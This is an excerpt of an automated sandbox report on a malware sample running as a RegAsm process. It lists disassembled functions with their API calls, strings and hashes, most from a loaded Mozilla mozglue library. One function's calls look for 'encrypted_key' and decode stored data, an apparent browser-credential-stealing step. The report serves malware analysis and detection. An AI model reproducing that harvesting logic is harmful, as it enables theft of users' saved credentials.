?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C535744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C5357BC
GetTickCount64.KERNEL32 ref: 6C5358CB
EnterCriticalSection.KERNEL32(6C59F688), ref: 6C5358F3
__aulldiv.LIBCMT ref: 6C535945
LeaveCriticalSection.KERNEL32(6C59F688), ref: 6C5359B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C59F638,?,?,?,?), ref: 6C5359E9

Strings

MOZ_APP_RESTART, xrefs: 6C5356CC

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: f2374e691c1f50284f68639efd1f6ead0f0316f2add1f26690f8fe89f7861d53
Instruction ID: 34c1b6795527135622f00cbf0fa2a6ac6375f6a48aec74cb516fa95a55f31b0a
Opcode Fuzzy Hash: f2374e691c1f50284f68639efd1f6ead0f0316f2add1f26690f8fe89f7861d53
Instruction Fuzzy Hash: D2C17C31A083909FDB05CF28C84065AB7F1FFCA754F56AB5DE4C897660E770A885CB86

Function 6C55EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55EC8C

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

GetCurrentThreadId.KERNEL32 ref: 6C55ECA1
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C55ECC5
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C55ED19
CloseHandle.KERNEL32(?), ref: 6C55ED28
free.MOZGLUE(00000000), ref: 6C55ED2F
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C55EC94

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 9287c11efeb548d0814bf6da996fa306b0cf3aaf3f1bd6a4e3e5d6d8420a809a
Instruction ID: 4d2db971004b490c7fc0f128bd6ef81bd4e0a415644cae93a94a80826af5984a
Opcode Fuzzy Hash: 9287c11efeb548d0814bf6da996fa306b0cf3aaf3f1bd6a4e3e5d6d8420a809a
Instruction Fuzzy Hash: 0F213571600144EBEF00AF64DC04AAA7739FB8626CF524256FC1987740DB79AC26CBA6

Function 6C575FF0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C576009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C576024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(QQl,?), ref: 6C576046
OutputDebugStringA.KERNEL32(?,QQl,?), ref: 6C576061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C576069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C576073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C576082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C59148E), ref: 6C576091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,QQl,00000000,?), ref: 6C5760BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C5760C4

Strings

QQl, xrefs: 6C575FFC, 6C576042, 6C576045, 6C5760B3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID: QQl
API String ID: 3835517998-3014088726
Opcode ID: 34839bb733d2ec281d5938f3573f33f879eaf4e3b96f0f8cf6ddf536599e442b
Instruction ID: 0c62e3cfa6b1f00ff04ecd24f9aec6c9692753151d09750da6ff468647c6e036
Opcode Fuzzy Hash: 34839bb733d2ec281d5938f3573f33f879eaf4e3b96f0f8cf6ddf536599e442b
Instruction Fuzzy Hash: 8A21B7B1A002589FDF206F25DC09A9E7BB8FF45718F018468E85A97240DB75A948CFE5

Function 6C523A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6C523BB4
ReleaseSRWLockShared.KERNEL32 ref: 6C523BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6C523BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6C523C91
ReleaseSRWLockShared.KERNEL32 ref: 6C523CBD
moz_xmalloc.MOZGLUE ref: 6C523CF1

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: 0f5b1ffb355c8a5eb44f1f7b775af2819f6d5e8a595c0c2372eeea364085ace5
Instruction ID: e546b41019e1d7108a80c2990534c8d425ca7e461cc2ba5a2162a0fe2d967f4b
Opcode Fuzzy Hash: 0f5b1ffb355c8a5eb44f1f7b775af2819f6d5e8a595c0c2372eeea364085ace5
Instruction Fuzzy Hash: E5C170B1904741CFC714DF29C88465ABBF5FF89304F158A9ED8998BB51E734E885CB82

Function 0041580D Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00415845
_memset.LIBCMT ref: 00415856

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 004121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041595C,?), ref: 004121F2

StrStrA.SHLWAPI(00000000), ref: 0041596A
GlobalFree.KERNEL32(?), ref: 00415A8C

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

lstrcatA.KERNEL32(?,00000000), ref: 00415A18
StrCmpCA.SHLWAPI(?,00436645), ref: 00415A35
lstrcatA.KERNEL32(?,?), ref: 00415A54
lstrcatA.KERNEL32(?,00436A8C), ref: 00415A65

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 4109952398-0
Opcode ID: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
Instruction ID: 4905153569d8748fa83d0ede9c9d82dcbc9816826170d9825a589ea8a61000d7
Opcode Fuzzy Hash: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
Instruction Fuzzy Hash: F8713DB1D4022D9FDF20DF61DC45BCA77BAAF88314F0405E6E908A3250EA369FA58F55

Function 00428B14 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00428B2D

Part of subcall function 00424074: Sleep.KERNEL32(00000000,?), ref: 0042409C

__calloc_crt.LIBCMT ref: 00428B51
_free.LIBCMT ref: 00428B5F
__calloc_crt.LIBCMT ref: 00428B6D
_free.LIBCMT ref: 00428B7D
_free.LIBCMT ref: 00428B83
__copytlocinfo_nolock.LIBCMT ref: 00428B92
__setlocale_nolock.LIBCMT ref: 00428B9F
_free.LIBCMT ref: 00428BB8
__setmbcp_nolock.LIBCMT ref: 00428BCA
_free.LIBCMT ref: 00428BD8
_free.LIBCMT ref: 00428BEC

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
Instruction ID: 316f7d86b509052675ed64499f597221969422cd52b172cd7ffbd25416df4cfd
Opcode Fuzzy Hash: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
Instruction Fuzzy Hash: 392126B1705621BADB217F26F802D4FBBE0DF91758BA0842FF48446261DF39A840C65D

Function 004015E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
GetLastError.KERNEL32 ref: 0040160C
SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
GetWindowContextHelpId.USER32(00000000), ref: 0040161B
GetWindowLongW.USER32(00000000,00000000), ref: 00401623
RegisterClassW.USER32(00000000), ref: 0040162A
IsWindowVisible.USER32(00000000), ref: 00401631
ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
HeapFree.KERNEL32(00000000), ref: 0040165D

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
String ID:
API String ID: 3627164727-0
Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE

Function 6C558ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C51EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C51EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C55B392,?,?,00000001), ref: 6C5591F4

Part of subcall function 6C54CBE8: GetCurrentProcess.KERNEL32(?,6C5131A7), ref: 6C54CBF1
Part of subcall function 6C54CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5131A7), ref: 6C54CBFA

Strings

name, xrefs: 6C558F16
timeline-memory, xrefs: 6C559088
data, xrefs: 6C5590E8
marker-chart, xrefs: 6C55905E
stack-chart, xrefs: 6C5590B2
timeline-fileio, xrefs: 6C5590A4
timeline-ipc, xrefs: 6C559096
timeline-overview, xrefs: 6C55907A
marker-table, xrefs: 6C55906C

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: acd116a95c4df98da82c5a88744a35f6d0012499b6d1b05a0777e4808854967e
Instruction ID: 8de9d17209d0a1374031c6ff4420658fca01a4a6a8f2f6f6812c83b9c9cdfc2a
Opcode Fuzzy Hash: acd116a95c4df98da82c5a88744a35f6d0012499b6d1b05a0777e4808854967e
Instruction Fuzzy Hash: 06B1CFB0A0121A9BDB04CF94CC86BAEBBF6AF89318F50441AD402ABF80D7759D55CBD1

Function 6C53C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C53C5A3
WideCharToMultiByte.KERNEL32 ref: 6C53C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C53C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C53CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C53CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C53CAA5

Strings

0, xrefs: 6C53D30A
(null), xrefs: 6C53C596

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 2c41c20f69799fa78f6d91aa5e5e9263308bfdc62c51732cad79c82fa1966cc6
Instruction ID: 132f7675d14a7740322f8a05276d8e8e2ffe096d3d2aa71c184273d18cd3e457
Opcode Fuzzy Hash: 2c41c20f69799fa78f6d91aa5e5e9263308bfdc62c51732cad79c82fa1966cc6
Instruction Fuzzy Hash: 17A1AC316093628FDB00DF29C94871ABBF1BF89348F059A5DE88A97741E731EC05CB92

Function 6C5148E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,6C55483A,?), ref: 6C514ACB
memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C55483A,?), ref: 6C514AE0
moz_xmalloc.MOZGLUE(?,?,6C55483A,?), ref: 6C514A82

Part of subcall function 6C52CA10: mozalloc_abort.MOZGLUE(?), ref: 6C52CAA2

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C55483A,?), ref: 6C514A97
moz_xmalloc.MOZGLUE(?,?,6C55483A,?), ref: 6C514A35

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C55483A,?), ref: 6C514A4A
moz_xmalloc.MOZGLUE(?,?,6C55483A,?), ref: 6C514AF4
moz_xmalloc.MOZGLUE(?,?,6C55483A,?), ref: 6C514B10
moz_xmalloc.MOZGLUE(?,?,6C55483A,?), ref: 6C514B2C

Strings

:HUl, xrefs: 6C5148EB, 6C5149FB

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID: :HUl
API String ID: 4251373892-1133748163
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: ac0dbe9f8232b3e4577f44ca123780e99c3b14a787cfa5c4460aed05c95a378f
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: 027148B1904606DFDB14CF68C884AAAB7F5FF48308B504A3ED15A9BB41E731FA55CB80

Function 6C53C769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C53C784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C53C801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C53C83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C53C891

Strings

NAN, xrefs: 6C53C7AD
inf, xrefs: 6C53C78F
INF, xrefs: 6C53C794
nan, xrefs: 6C53C7A8

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: 5efb92345e1508fc88cb13af82a314982bf6055de55be55e396069d0e2854ade
Instruction ID: e38226155f67f05fe665481006db6b500a845530214eede1ff4fcceda00047c1
Opcode Fuzzy Hash: 5efb92345e1508fc88cb13af82a314982bf6055de55be55e396069d0e2854ade
Instruction Fuzzy Hash: D55194709087A08BD700EF6CC88169AFBF0BF8A304F019A1DE9D997651F770E9858B43

Function 6C513480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C513492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C5134A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C5134EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C51350E
__Init_thread_footer.LIBCMT ref: 6C513522
__aulldiv.LIBCMT ref: 6C513552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C51357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C513592

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C513508
kernel32.dll, xrefs: 6C5134EA

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

